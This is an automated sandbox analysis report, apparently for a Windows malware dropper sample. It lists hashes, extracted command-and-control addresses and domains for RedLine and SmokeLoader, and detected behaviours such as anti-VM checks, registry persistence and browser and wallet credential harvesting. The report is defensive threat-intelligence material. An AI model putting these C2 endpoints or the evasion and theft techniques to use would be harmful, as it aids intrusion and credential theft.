Analysis
-
max time kernel
1798s -
max time network
1808s -
platform
windows11_x64 -
resource
win11 -
submitted
17-08-2021 08:50
Static task
static1
Behavioral task
behavioral1
Sample
375C1FFE19F2FBA6FF5F32B4000CDEA4.exe
Resource
win7v20210408
General
-
Target
375C1FFE19F2FBA6FF5F32B4000CDEA4.exe
-
Size
631KB
-
MD5
375c1ffe19f2fba6ff5f32b4000cdea4
-
SHA1
2557bf9d890e4e0832fb03474657dae9c0037db3
-
SHA256
b9f79bcb4c0ea9e939b35813e807fda308b7038f1dea613e7d8bbd7fe127ac84
-
SHA512
63c504fe78a323e570bc56459f6081e33444e6ebd8b39e64c1b4019c6dd32ad3d9b603f3f0e72d42963f39f5a3e676d1b3a60bd251287266b494faf591206042
Malware Config
Extracted
redline
4
213.166.68.170:16810
Extracted
smokeloader
2020
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
http://readinglistforaugust1.club/
http://readinglistforaugust2.club/
http://readinglistforaugust3.club/
http://readinglistforaugust4.club/
http://readinglistforaugust5.club/
http://readinglistforaugust6.club/
http://readinglistforaugust7.club/
http://readinglistforaugust8.club/
http://readinglistforaugust9.club/
http://readinglistforaugust10.club/
Extracted
metasploit
windows/single_exec
Extracted
redline
ls4
ighaisexel.xyz:80
Extracted
redline
32222
188.124.36.242:25802
Signatures
-
Glupteba Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/840-380-0x0000000001600000-0x0000000001F26000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerUNdlL32.eXerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 448 4788 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5476 4788 rUNdlL32.eXe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6148 4788 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 9 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\8HEOXyIuppRBNR0NhZp_MAyf.exe family_redline C:\Users\Admin\Documents\vri9QJNUrvtCCtcp5iTLexaq.exe family_redline C:\Users\Admin\Documents\8HEOXyIuppRBNR0NhZp_MAyf.exe family_redline C:\Users\Admin\Documents\vri9QJNUrvtCCtcp5iTLexaq.exe family_redline behavioral2/memory/4968-297-0x0000029882D30000-0x0000029882D49000-memory.dmp family_redline behavioral2/memory/3800-314-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/488-326-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral2/memory/488-322-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/3800-318-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 19 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exenote8876.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 4568 created 656 4568 WerFault.exe VjGNJYTkssviPnxpDIwNcfng.exe PID 3276 created 1996 3276 WerFault.exe svchost.exe PID 5000 created 4456 5000 WerFault.exe 1NpraAWhj4kgz1ajLCCVpFRf.exe PID 3628 created 1016 3628 WerFault.exe WerFault.exe PID 2740 created 2812 2740 WerFault.exe qTlcjPAmCYslnsQO0fRE5dYW.exe PID 3496 created 1192 3496 WerFault.exe 52gsIfQbxcku44ZeI8702OJN.exe PID 2540 created 1608 2540 WerFault.exe mvaT_YqO7KekkPxnX5BA4Fiz.exe PID 2052 created 840 2052 WerFault.exe iRqjX4A5YnqgK2YsIoMgdSoD.exe PID 4684 created 4276 4684 note8876.exe rundll32.exe PID 5860 created 4716 5860 WerFault.exe msedge.exe PID 6048 created 4244 6048 WerFault.exe rundll32.exe PID 6132 created 1072 6132 WerFault.exe askinstall53.exe PID 1016 created 5744 1016 WerFault.exe 6297292.exe PID 5624 created 5368 5624 WerFault.exe 3924183.exe PID 4344 created 3932 4344 WerFault.exe VC_redist.x64.exe PID 6676 created 6028 6676 WerFault.exe VC_redist.x86.exe PID 6664 created 6740 6664 WerFault.exe Conhost.exe PID 6824 created 6740 6824 WerFault.exe Conhost.exe PID 5900 created 6748 5900 WerFault.exe rundll32.exe -
Processes:
resource yara_rule C:\Users\Admin\Documents\XLKr7Gg3jXYqn3Cb0v5ROYaS.exe evasion C:\Users\Admin\Documents\KbRivSLWxMXy_7RFr0zzm9xk.exe evasion C:\Users\Admin\Documents\XLKr7Gg3jXYqn3Cb0v5ROYaS.exe evasion C:\Users\Admin\Documents\KbRivSLWxMXy_7RFr0zzm9xk.exe evasion behavioral2/memory/840-380-0x0000000001600000-0x0000000001F26000-memory.dmp evasion -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\11111.exe Nirsoft behavioral2/memory/2540-293-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft C:\Users\Admin\AppData\Local\Temp\11111.exe Nirsoft -
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral2/memory/656-227-0x0000000004A00000-0x0000000004A9D000-memory.dmp family_vidar behavioral2/memory/4716-473-0x0000000000CA0000-0x0000000000D3D000-memory.dmp family_vidar -
Blocklisted process makes network request 10 IoCs
Processes:
MsiExec.exepowershell.exeflow pid process 175 6012 MsiExec.exe 178 6012 MsiExec.exe 179 6012 MsiExec.exe 180 6012 MsiExec.exe 181 6012 MsiExec.exe 187 6012 MsiExec.exe 195 6012 MsiExec.exe 199 6012 MsiExec.exe 281 6248 powershell.exe 286 6248 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
TmkGCvXufEjdq7bBSflS1DJU.exe3377047_logo_media.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts TmkGCvXufEjdq7bBSflS1DJU.exe File opened for modification C:\Windows\system32\drivers\etc\hosts 3377047_logo_media.exe -
Executes dropped EXE 64 IoCs
Processes:
KpjOE9plqshxTez0Y9Dq5Tb5.exe8HEOXyIuppRBNR0NhZp_MAyf.exewtASthkTL07xVBxtjE9a02tm.exeEZrtSzAMJQfXsQrLCzQybKjh.exeiRqjX4A5YnqgK2YsIoMgdSoD.exe49G7lSDL36pm6Tf9CJu2K920.exeTmkGCvXufEjdq7bBSflS1DJU.exeVjGNJYTkssviPnxpDIwNcfng.exe1NpraAWhj4kgz1ajLCCVpFRf.exeloELqQbmJRQpxMeJ5AAEU5fN.exeqTlcjPAmCYslnsQO0fRE5dYW.exeKbRivSLWxMXy_7RFr0zzm9xk.exec_VdWDUCwwtRatLZqa1msoRS.exeXLKr7Gg3jXYqn3Cb0v5ROYaS.exewXv39P__TJcA2k12V2Zgx03I.exe52gsIfQbxcku44ZeI8702OJN.exevri9QJNUrvtCCtcp5iTLexaq.exemJimMqtn6WWB9vVWN43v00Qa.exesItBlTP8i4E25HX__m218TGK.exe1U9482xac9Vdw81qeLADoS78.exe1P2iyh2JidvGFh4oERonoUp_.exeHsB706rZ5ITpXQS1ycIHz9Ks.exemvaT_YqO7KekkPxnX5BA4Fiz.execustomer3.exe8EiYpKhDEcXgXVlhx5Kwkd8q.exemd8_8eus.exejooyu.exe8EiYpKhDEcXgXVlhx5Kwkd8q.tmpWerFault.exewXv39P__TJcA2k12V2Zgx03I.exewtASthkTL07xVBxtjE9a02tm.exeKbRivSLWxMXy_7RFr0zzm9xk.exeXLKr7Gg3jXYqn3Cb0v5ROYaS.exejfiag3g_gg.exe11111.exe11111.exe11111.exe11111.exeConhost.exeVC_redist.x64.exeVC_redist.x64.exejfiag3g_gg.exeSetup.exe11111.exe11111.exemsedge.exe11111.exeMediaBurner2.exeaskinstall53.exeCleaner Installation.exeVersiumresearch.exenote8876.exezhangfei.exeMediaBurner2.tmpGameBox.exe3377047_logo_media.exezhangfei.exe22222.exeWerFault.exe3924183.exe1473080.exe4317104.exe6297292.exe22222.exepid process 5008 KpjOE9plqshxTez0Y9Dq5Tb5.exe 4956 8HEOXyIuppRBNR0NhZp_MAyf.exe 3876 wtASthkTL07xVBxtjE9a02tm.exe 836 EZrtSzAMJQfXsQrLCzQybKjh.exe 840 iRqjX4A5YnqgK2YsIoMgdSoD.exe 4112 49G7lSDL36pm6Tf9CJu2K920.exe 4796 TmkGCvXufEjdq7bBSflS1DJU.exe 656 VjGNJYTkssviPnxpDIwNcfng.exe 4456 1NpraAWhj4kgz1ajLCCVpFRf.exe 572 loELqQbmJRQpxMeJ5AAEU5fN.exe 2812 qTlcjPAmCYslnsQO0fRE5dYW.exe 4188 KbRivSLWxMXy_7RFr0zzm9xk.exe 1016 c_VdWDUCwwtRatLZqa1msoRS.exe 548 XLKr7Gg3jXYqn3Cb0v5ROYaS.exe 1388 wXv39P__TJcA2k12V2Zgx03I.exe 1192 52gsIfQbxcku44ZeI8702OJN.exe 1064 vri9QJNUrvtCCtcp5iTLexaq.exe 1996 mJimMqtn6WWB9vVWN43v00Qa.exe 2432 sItBlTP8i4E25HX__m218TGK.exe 4968 1U9482xac9Vdw81qeLADoS78.exe 4196 1P2iyh2JidvGFh4oERonoUp_.exe 1200 HsB706rZ5ITpXQS1ycIHz9Ks.exe 1608 mvaT_YqO7KekkPxnX5BA4Fiz.exe 2628 customer3.exe 1380 8EiYpKhDEcXgXVlhx5Kwkd8q.exe 3704 md8_8eus.exe 3952 jooyu.exe 4204 8EiYpKhDEcXgXVlhx5Kwkd8q.tmp 2540 WerFault.exe 2460 wXv39P__TJcA2k12V2Zgx03I.exe 4580 wtASthkTL07xVBxtjE9a02tm.exe 3800 KbRivSLWxMXy_7RFr0zzm9xk.exe 488 XLKr7Gg3jXYqn3Cb0v5ROYaS.exe 1500 jfiag3g_gg.exe 1168 11111.exe 1540 11111.exe 2008 11111.exe 468 11111.exe 1536 Conhost.exe 3932 VC_redist.x64.exe 5100 VC_redist.x64.exe 2248 jfiag3g_gg.exe 3620 Setup.exe 1468 11111.exe 2168 11111.exe 4716 msedge.exe 2528 11111.exe 4332 MediaBurner2.exe 1072 askinstall53.exe 3708 Cleaner Installation.exe 1040 Versiumresearch.exe 4684 note8876.exe 1516 zhangfei.exe 3060 MediaBurner2.tmp 5320 GameBox.exe 5676 3377047_logo_media.exe 5732 zhangfei.exe 6024 22222.exe 6132 WerFault.exe 5368 3924183.exe 5552 1473080.exe 5640 4317104.exe 5744 6297292.exe 6052 22222.exe -
Processes:
resource yara_rule C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe vmprotect C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe vmprotect behavioral2/memory/3704-272-0x0000000000400000-0x000000000067D000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
vri9QJNUrvtCCtcp5iTLexaq.exe8HEOXyIuppRBNR0NhZp_MAyf.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vri9QJNUrvtCCtcp5iTLexaq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vri9QJNUrvtCCtcp5iTLexaq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8HEOXyIuppRBNR0NhZp_MAyf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8HEOXyIuppRBNR0NhZp_MAyf.exe -
Drops startup file 2 IoCs
Processes:
customer3.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe customer3.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe customer3.exe -
Loads dropped DLL 64 IoCs
Processes:
1P2iyh2JidvGFh4oERonoUp_.exe1U9482xac9Vdw81qeLADoS78.exe8EiYpKhDEcXgXVlhx5Kwkd8q.tmprundll32.exeVC_redist.x64.exeMediaBurner2.tmpCleaner Installation.exerundll32.exeMsiExec.exeMsiExec.exeVC_redist.x86.exeinstaller.exeMsiExec.exeinstaller.tmpConhost.exerundll32.exeCleaner_Installation.exeCleaner.exeCleaner.exeCleaner.exeCleaner.exeCleaner.exeCleaner.exepid process 4196 1P2iyh2JidvGFh4oERonoUp_.exe 4968 1U9482xac9Vdw81qeLADoS78.exe 4204 8EiYpKhDEcXgXVlhx5Kwkd8q.tmp 4204 8EiYpKhDEcXgXVlhx5Kwkd8q.tmp 4196 1P2iyh2JidvGFh4oERonoUp_.exe 4276 rundll32.exe 3932 VC_redist.x64.exe 3060 MediaBurner2.tmp 3708 Cleaner Installation.exe 4244 rundll32.exe 4196 1P2iyh2JidvGFh4oERonoUp_.exe 4196 1P2iyh2JidvGFh4oERonoUp_.exe 5004 MsiExec.exe 5004 MsiExec.exe 4196 1P2iyh2JidvGFh4oERonoUp_.exe 6012 MsiExec.exe 4196 1P2iyh2JidvGFh4oERonoUp_.exe 6012 MsiExec.exe 6028 VC_redist.x86.exe 6012 MsiExec.exe 6012 MsiExec.exe 6012 MsiExec.exe 6012 MsiExec.exe 6012 MsiExec.exe 6012 MsiExec.exe 6012 MsiExec.exe 4196 1P2iyh2JidvGFh4oERonoUp_.exe 6012 MsiExec.exe 2004 installer.exe 2004 installer.exe 2004 installer.exe 6348 MsiExec.exe 6348 MsiExec.exe 4196 1P2iyh2JidvGFh4oERonoUp_.exe 6068 installer.tmp 6740 Conhost.exe 6740 Conhost.exe 6740 Conhost.exe 6748 rundll32.exe 4196 1P2iyh2JidvGFh4oERonoUp_.exe 4196 1P2iyh2JidvGFh4oERonoUp_.exe 1840 Cleaner_Installation.exe 1840 Cleaner_Installation.exe 1840 Cleaner_Installation.exe 1840 Cleaner_Installation.exe 1840 Cleaner_Installation.exe 3268 Cleaner.exe 3268 Cleaner.exe 3268 Cleaner.exe 1840 Cleaner_Installation.exe 5968 Cleaner.exe 1624 Cleaner.exe 1624 Cleaner.exe 1624 Cleaner.exe 5992 Cleaner.exe 5992 Cleaner.exe 5992 Cleaner.exe 5132 Cleaner.exe 5132 Cleaner.exe 5132 Cleaner.exe 3016 Cleaner.exe 5992 Cleaner.exe 3016 Cleaner.exe 3016 Cleaner.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\8HEOXyIuppRBNR0NhZp_MAyf.exe themida C:\Users\Admin\Documents\vri9QJNUrvtCCtcp5iTLexaq.exe themida C:\Users\Admin\Documents\8HEOXyIuppRBNR0NhZp_MAyf.exe themida C:\Users\Admin\Documents\vri9QJNUrvtCCtcp5iTLexaq.exe themida behavioral2/memory/1064-284-0x0000000000CA0000-0x0000000000CA1000-memory.dmp themida behavioral2/memory/4956-278-0x00000000001E0000-0x00000000001E1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 14 IoCs
Processes:
aipackagechainer.exeCleaner_Installation.exemsedge.exe3377047_logo_media.exeVC_redist.x64.exemsedge.exeVC_redist.x86.exe1473080.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Cleaner_Installation.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Cleaner = "C:\\Users\\Admin\\AppData\\Roaming\\Cleaner\\Cleaner.exe --anbfs" Cleaner_Installation.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xukaexiduji.exe\"" 3377047_logo_media.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{5c6cccca-61ec-4667-a8d9-e133a59a5a73} = "\"C:\\ProgramData\\Package Cache\\{5c6cccca-61ec-4667-a8d9-e133a59a5a73}\\VC_redist.x64.exe\" /burn.runonce" VC_redist.x64.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce VC_redist.x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce VC_redist.x86.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 1473080.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{a8968509-65be-4c09-a460-fd1584b1cdbf} = "\"C:\\ProgramData\\Package Cache\\{a8968509-65be-4c09-a460-fd1584b1cdbf}\\VC_redist.x86.exe\" /burn.runonce" VC_redist.x86.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
vri9QJNUrvtCCtcp5iTLexaq.exe8HEOXyIuppRBNR0NhZp_MAyf.exemd8_8eus.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA vri9QJNUrvtCCtcp5iTLexaq.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8HEOXyIuppRBNR0NhZp_MAyf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Cleaner Installation.exemsiexec.exeinstaller.exedescription ioc process File opened (read-only) \??\N: Cleaner Installation.exe File opened (read-only) \??\Q: Cleaner Installation.exe File opened (read-only) \??\T: Cleaner Installation.exe File opened (read-only) \??\W: Cleaner Installation.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\E: Cleaner Installation.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\H: Cleaner Installation.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\J: Cleaner Installation.exe File opened (read-only) \??\R: Cleaner Installation.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: Cleaner Installation.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\V: Cleaner Installation.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\Y: Cleaner Installation.exe File opened (read-only) \??\F: Cleaner Installation.exe File opened (read-only) \??\K: Cleaner Installation.exe File opened (read-only) \??\L: Cleaner Installation.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\B: Cleaner Installation.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\O: Cleaner Installation.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\X: Cleaner Installation.exe File opened (read-only) \??\P: Cleaner Installation.exe File opened (read-only) \??\S: Cleaner Installation.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\I: Cleaner Installation.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\M: Cleaner Installation.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 ipinfo.io 4 ip-api.com 18 ipinfo.io 28 ipinfo.io 111 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
8HEOXyIuppRBNR0NhZp_MAyf.exevri9QJNUrvtCCtcp5iTLexaq.exepid process 4956 8HEOXyIuppRBNR0NhZp_MAyf.exe 1064 vri9QJNUrvtCCtcp5iTLexaq.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
wtASthkTL07xVBxtjE9a02tm.exeKbRivSLWxMXy_7RFr0zzm9xk.exeXLKr7Gg3jXYqn3Cb0v5ROYaS.exeEZrtSzAMJQfXsQrLCzQybKjh.exeServices.exeTmkGCvXufEjdq7bBSflS1DJU.exedescription pid process target process PID 3876 set thread context of 4580 3876 wtASthkTL07xVBxtjE9a02tm.exe wtASthkTL07xVBxtjE9a02tm.exe PID 4188 set thread context of 3800 4188 KbRivSLWxMXy_7RFr0zzm9xk.exe KbRivSLWxMXy_7RFr0zzm9xk.exe PID 548 set thread context of 488 548 XLKr7Gg3jXYqn3Cb0v5ROYaS.exe XLKr7Gg3jXYqn3Cb0v5ROYaS.exe PID 836 set thread context of 6632 836 EZrtSzAMJQfXsQrLCzQybKjh.exe EZrtSzAMJQfXsQrLCzQybKjh.exe PID 3176 set thread context of 6884 3176 Services.exe explorer.exe PID 4796 set thread context of 3948 4796 TmkGCvXufEjdq7bBSflS1DJU.exe TmkGCvXufEjdq7bBSflS1DJU.exe -
Drops file in Program Files directory 64 IoCs
Processes:
1P2iyh2JidvGFh4oERonoUp_.exeSetup.exesItBlTP8i4E25HX__m218TGK.exeultramediaburner.tmpdescription ioc process File created C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\01_googleimage.luac 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\soundcloud.luac 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_a52_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libsubsdelay_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe Setup.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\koreus.luac 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac 1P2iyh2JidvGFh4oERonoUp_.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe sItBlTP8i4E25HX__m218TGK.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\bbc_co_uk.luac 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libexport_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\youtube.luac 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\mosaic_window.html 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll 1P2iyh2JidvGFh4oERonoUp_.exe File created C:\Program Files 